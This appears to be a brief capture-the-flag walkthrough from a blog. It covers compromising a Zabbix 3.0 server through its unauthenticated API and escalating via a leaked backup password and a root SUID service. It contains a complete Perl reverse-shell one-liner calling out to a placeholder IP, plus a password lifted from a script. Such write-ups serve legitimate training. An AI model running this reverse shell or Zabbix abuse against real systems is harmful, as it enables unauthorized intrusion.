Usually scan,nmap+dirb+gobuster+msftcp
find zabbix,ver3.0.21:
think about zabbix has jsrpc.php,any exploit?,json interface is not authorized to access,search it:
python has library named zabbixapi,https://github.com/lukecyca/pyzabbix
EXP. add host:http://blog.chinaunix.net/uid-28309325-id-5176638.html
createuser.py:
createscript.py:
The execute script must execute on zabbix agent not on server cuz server its a docker container
the panel of script before:
after excute the script:
editor the script,use the stable perl or python to backconnect:
perl-e’use Socket;$i=”x.x.x.x”;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};'<br />
create events or triggers,filter use any,more hosts possible:
ncat to listen:
find the files of user zapper is permission denied,cat the backup.sh:
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null
shell for backup,-p could be the pwd for zapper
zapper can not ssh:
use python to get a interactive shell:
so can use su,input the pwd,login successfully:
get user.txt
search folder:
The only one that runs with root is the service. Actually, the administrator may be negligent. This should be the way to leave a question for us
suid is running by root
download the pdf of writeup
文章来源:lsh4ck’s Blog
暂无评论内容